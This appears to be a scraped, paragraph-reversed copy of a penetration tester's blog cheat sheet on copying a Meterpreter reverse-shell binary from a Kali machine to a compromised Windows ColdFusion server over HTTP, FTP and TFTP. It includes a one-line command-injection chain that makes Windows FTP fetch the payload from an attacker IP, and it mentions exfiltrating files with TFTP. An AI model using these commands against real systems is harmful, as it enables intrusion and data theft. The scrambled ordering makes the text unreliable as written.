![]() ![]() The Metasploit server saves them in /tmp by default Just simply use the -i flag and the GET action.Įxfiltrating files via TFTP is simple as well with the PUT action. Set the module options, including TFTPROOT, which determines which directory to serve up, and OUTPUTPATH if you want to capture TFTP uploads from Windows as well.Īgain, assuming the tftp utility is installed, you can grab a file with one line from the Windows prompt. ![]() Metasploit, like with FTP, has an auxiliary TFTP server module at auxiliary/server/tftp. I’ve always had a hell of a time getting it configured and working though, and I rarely need to start and keep running a TFTP server as a service, so I just use the simpler Metasploit module. ![]() Kali comes with a TFTP server installed, atftpd, which can be started with a simple service atftpd start. If the Windows machine you have access to happens to have the tftp client installed, however, it can make a really convenient way to grab files in a single command. It used to be installed by default in Windows XP, but now needs to be manually enabled on newer versions of Windows. Trivial file transfer protocol is another possiblity if tftp is installed on the system. Which means if we have a text file on the system that contains this:Ĭ:\Users\jarrieta\Desktop>echo open 10.9.122.8>ftp_commands.txt&echo anonymous>ftp_commands.txt&echo password>ftp_commands.txt&echo binary>ftp_commands.txt&echo get met8888.exe>ftp_commands.txt&echo bye>ftp_commands.txt&ftp -s:ftp_commands.txtĮither way you’ll end up with met8888.exe on the Windows host. Now this is great if you have an interactive shell where you can actually drop into the FTP prompt and issue commands, but it’s not that useful if you just have command injection and can only issue one command at a time.įortunately, windows FTP can take a “script” of commands directly from the command line. Authenticate with user anonymous and any password You can open an FTP connection and download the files directly from Kali on the command line. Kill it with jobs -k Downloading the filesĪs mentioned earlier, Windows has an FTP client built in to the PATH. Set the FTPROOT to the directory you want to share and run exploit: There is also an auxiliary FTP server built in to Metasploit as well that is easy to deploy and configure. If you want to grant the anonymous user write access, add the -w flag as well. One benefit of using FTP over HTTP is the ability to transfer files both way. With no arguments it runs on port 2121 and accepts anonymous authentication. Now from the directory you want to serve, just run the Python module. This only requires a single line of Python thanks to Python’s SimpleHTTPServer module: The other option is to just start a Python webserver directly inside the shells directory. To serve a file up over Apache, just simply copy it to /var/www/html and enable the Apache service. The two ways I usually serve a file over HTTP from Kali are either through Apache or through a Python HTTP server. HTTPĭownloading files via HTTP is pretty straightforward if you have access to the desktop and can open up a web browser, but it’s also possible to do it through the command line as well. I’m putting this post together as a “cheat sheet” of sorts for my favorite ways to transfer files.įor purposes of demonstration, the file I’ll be copying over using all these methods is called met8888.exe and is located in /root/shells. I generated the payload with Veil but needed a way to transfer the file to the Windows server running ColdFusion through simple commands. It was a very limited, non-interactive shell and I wanted to download and execute a reverse Meterpreter binary from my attack machine. As a perfect example, on a recent pentest, I found a vulnerable ColdFusion server and was able to upload a CFM webshell. Often times on an engagement I find myself needing to copy a tool or a payload from my Kali linux attack box to a compromised Windows machine. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |